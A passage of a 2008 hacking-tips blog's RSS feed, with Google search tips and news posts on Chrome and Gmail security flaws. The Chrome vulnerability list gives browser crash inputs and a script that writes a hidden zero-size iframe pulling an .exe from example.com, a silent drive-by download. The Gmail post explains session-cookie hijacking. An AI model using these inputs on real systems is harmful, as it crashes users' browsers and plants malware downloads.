<p>which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google&#8217;s tools and services at</p>
<p>www.google.com/options/index.html</p>
<p>You&#8217;re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?<strong></p>
<p>Google Alert</strong></p>
<p>(www.googlealert.com)</p>
<p>monitors your search terms and e-mails you information about new additions to Google&#8217;s Web index. (Google Alert is not affiliated with Google; it uses Google&#8217;s Web services API to perform its searches.) If you&#8217;re more interested in news stories than general Web content, check out the beta version of Google News Alerts</p>
<p>(www.google.com/newsalerts).</p>
<p>This service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)</p>
<p><strong>Google on the telephone?</strong> Yup. This service is brought to you by the folks at Google Labs</p>
<p>(http://labs.google.com),</p>
<p>a place for experimental Google ideas and features (which may come and go, so what&#8217;s there at this writing might not be there when you decide to check it out). With Google Voice Search</p>
<p>(http://labs1.google.com/gvs.html),</p>
<p>you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don&#8217;t expect 100 percent success.</p>
<p>In 2002, Google released the Google API (application programming interface), a way for programmers to access Google&#8217;s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you&#8217;ll need an API key, which is available free from<br />
CODE<br />
www.google.com/apis</p>
<p>Thanks to its many different search properties, Google goes far beyond a regular search engine. Give the tricks in this article a try. You&#8217;ll be amazed at how many different ways Google can improve your Internet searching.</p>
<p><strong>Online Extra: More Google Tips</strong></p>
<p>Here are a few more clever ways to tweak your Google searches.</p>
<p><strong>Search Within a Timeframe</strong></p>
<p>Daterange: (start date–end date). You can restrict your searches to pages that were indexed within a certain time period. Daterange: searches by when Google indexed a page, not when the page itself was created. This operator can help you ensure that results will have fresh content (by using recent dates), or you can use it to avoid a topic&#8217;s current-news blizzard and concentrate only on older results. Daterange: is actually more useful if you go elsewhere to take advantage of it, because daterange: requires Julian dates, not standard Gregorian dates. You can find converters on the Web (such as</p>
<p>CODE</p>
<p>http://aa.usno.navy.mil/data/docs/JulianDate.html</p>
<p>excl.gif No Active Links, Read the Rules &#8211; Edit by Ninja excl.gif), but an easier way is to do a Google daterange: search by filling in a form at</p>
<p>www.researchbuzz.com/toolbox/goofresh.shtml or www.faganfinder.com/engines/google.shtml</p>
<p>If one special syntax element is good, two must be better, right? Sometimes. Though some operators can&#8217;t be mixed (you can&#8217;t use the link: operator with anything else) many can be, quickly narrowing your results to a less overwhelming number.</p>
<p><strong>More Google API Applications</strong></p>
<p>Staggernation.com offers three tools based on the Google API. The Google API Web Search by Host (GAWSH) lists the Web hosts of the results for a given query</p>
<p>(www.staggernation.com/gawsh/).</p>
<p>When you click on the triangle next to each host, you get a list of results for that host. The Google API Relation Browsing Outliner (GARBO) is a little more complicated: You enter a URL and choose whether you want pages that related to the URL or linked to the URL</p>
<p>(www.staggernation.com/garbo/).</p>
<p>Click on the triangle next to an URL to get a list of pages linked or related to that particular URL. CapeMail is an e-mail search application that allows you to send an e-mail to google@capeclear.com with the text of your query in the subject line and get the first ten results for that query back. Maybe it&#8217;s not something you&#8217;d do every day, but if your cell phone does e-mail and doesn&#8217;t do Web browsing, this is a very handy address to know.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=349&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/20-great-google-secrets.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Google Chrome as a Hacking Tool</title>
		<link>http://www.hungry-hackers.com/2008/09/google-chrome-as-a-hacking-tool.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/google-chrome-as-a-hacking-tool.html#comments</comments>
		<pubDate>Sat, 06 Sep 2008 06:36:31 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Downloads]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Crash]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tips]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=347</guid>
		<description><![CDATA[This is not a joke. If you are using Google Chrome then it is very easy for a malicious attacker to get the Remote Access of your Computer.
Less than a week after the release of Google (NSDQ:GOOG)&#8217;s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user&#8217;s computer.
The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the &#8220;Save As&#8221; function. If a user saves a ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">This is not a joke. If you are using Google Chrome then it is very easy for a malicious attacker to get the Remote Access of your Computer.</p>
<p style="text-align: justify;">Less than a week after the release of Google (NSDQ:GOOG)&#8217;s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user&#8217;s computer.</p>
<p>The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the &#8220;Save As&#8221; function. If a user saves a Web page serving malicious content, the program could cause a stack-based overflow error, which could open the door for remote hackers to unleash malicious code on a user&#8217;s machine.</p>
<p>Remote attackers could then exploit the flaw by constructing a specially crafted Web page infused with malicious code. The attacker could then entice a victim to open and then save the infected page, which would subsequently download malicious code onto the victim&#8217;s computer and give the attacker complete access to the affected system.</p>
<p>Chrome&#8217;s latest buffer overflow vulnerability is one of about half a dozen errors detected in the newly released beta Web browser, about half of which allow for remote code execution, experts say. Another vulnerability, discovered shortly after the browser&#8217;s release Tuesday, included a carpetbombing glitch that stemmed from a fundamental flaw in the underlying user agent Safari 3.1.</p>
<p>However experts say that several Chrome beta version flaws are anticipated and will likely be worked out with the final version as the browser is subsequently tested.</p>
<p>&#8220;I think for a new product like Chrome, it doesn&#8217;t concern me much that they&#8217;re discovering the number of vulnerabilities and the details are getting out there. That&#8217;s the point of beta, especially open source beta,&#8221; said John Bambenek, handler for the SANS Internet Storm Center. &#8220;I think that the people who are really into getting exploits on a number of machines are not interested in messing with Chrome until (Google) gets some distribution out there.&#8221;</p>
<p>&#8220;If it&#8217;s not public information, the hackers don&#8217;t have it either,&#8221; he added.</p>
<p>And despite some errors that could lead to remote exploitation, experts say that because the browser is still in beta and not yet widely adopted, security threats for most users for the time being remains small.</p>
<p>&#8220;I don&#8217;t think the consumer impact is very large yet,&#8221; said Bambenek, &#8220;but that could change very quickly.&#8221;</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=347&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/google-chrome-as-a-hacking-tool.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Chrome Vulnerabilities list</title>
		<link>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html</link>
		<comments>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html#comments</comments>
		<pubDate>Sat, 06 Sep 2008 05:52:04 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Bad Boy]]></category>
		<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Crashed]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[List]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[Web Browser]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=346</guid>
		<description><![CDATA[Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I&#8217;m not going to review Google Chrome&#8217;s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:
Just browse this page and place your mouse over this link (make sure you bookmark this page if you want ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I&#8217;m not going to review Google Chrome&#8217;s features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few Hours)</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.hackerscenter.com/images/62//chrome_sm.jpg" border="0" alt="" /></p>
<p style="text-align: justify;"><a href="http://www.greyhat.in/" target="_blank">Rishi Narang</a> has been the first. A Denial Of Service simple as pie:</p>
<p style="text-align: justify;">Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):</p>
<blockquote style="text-align: justify;"><p><a href="evil:%">CRASH ME </a></p></blockquote>
<p style="text-align: justify;">Just &#8220;evil:%&#8221; in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).</p>
<p style="text-align: justify;">Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it&#8217;s worth a try.</p>
<p style="text-align: justify;">If your Chrome is still alive you may want to try entering</p>
<blockquote style="text-align: justify;"><p>about@:</p></blockquote>
<p style="text-align: justify;">in the location bar.</p>
<p>Good thing is that the browser doesn&#8217;t need Administrator rights to run.</p>
<p style="text-align: justify;"><a href="http://www.mattcutts.com/blog/" target="_blank">Matt Cutt </a>from his blog has stated that the <a href="http://www.google.com/chrome/eula.html" target="_blank">chapter 11 of Eula</a> will be updated. Yes the chapter about you giving all the rights to Google:</p>
<blockquote style="text-align: justify;"><p>a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.</p></blockquote>
<p style="text-align: justify;">I&#8217;m worried about the enthusiastic reviews I see online.<br />
Google brand was enough to push an <em>unfinished</em> product up to <a href="http://blog.statcounter.com/" target="_blank">make it 1% of the User-Agent&#8217;s</a> used on its very first day.<br />
The risk is high, fuzzers are still crunching&#8230;
</p>
<p style="text-align: justify;"><strong>Update:</strong></p>
<blockquote><p><strong>Another Bug found.</strong><br />
&lt; script &gt; document.write(&#8216;&lt; iframe src=&#8221;http://www.example.com/hello.exe&#8221; frameborder=&#8221;0&#8243; width=&#8221;0&#8243; height=&#8221;0&#8243; &gt;&#8217;); &lt; / script &gt;</p></blockquote>
<p>This script <em>should</em> (I haven&#8217;t tested it yet, will do it later) trigger a silent download on the client machine.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=346&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/09/google-chrome-vulnerablities-list.html/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Gmail Account Hacking Tool</title>
		<link>http://www.hungry-hackers.com/2008/08/gmail-account-hacking-tool.html</link>
		<comments>http://www.hungry-hackers.com/2008/08/gmail-account-hacking-tool.html#comments</comments>
		<pubDate>Tue, 19 Aug 2008 12:57:03 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Decryption]]></category>
		<category><![CDATA[Google Hacking]]></category>
		<category><![CDATA[Orkut Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Account]]></category>
		<category><![CDATA[Adsense]]></category>
		<category><![CDATA[Blogger]]></category>
		<category><![CDATA[GMail]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Orkut]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=343</guid>
		<description><![CDATA[A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.
Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.
When ...]]></description>
			<content:encoded><![CDATA[<p>A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.</p>
<p>Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.</p>
<p>When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.</p>
<p>Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.</p>
<p>The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks. <span style="color: #000000;">Todd  Mumford, from the <a title="SEO Visions" href="http://www.seovisions.com/" target="_blank">SEO company</a> called <a title="SEO Visions" href="http://www.seovisions.com/internet-marketing.html" target="_blank">SEO Visions Inc</a>, states &#8220;This can be a  serious problem for Internet Marketers who travel often and use their wireless  laptops and Gmal services often and do not always have access to a secure  connection&#8221;</span></p>
<p><span style="color: #000000;">Per</span>ry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. &#8220;Google did not explain why using this new feature was so important&#8221; he said. He continued and explained the implications of not informing the users, &#8220;This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they&#8217;re secure but they&#8217;re really not.&#8221;</p>
<p>If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=343&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/08/gmail-account-hacking-tool.html/feed</wfw:commentRss>
		<slash:comments>204</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1241/1445 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-12 01:42:40 -->
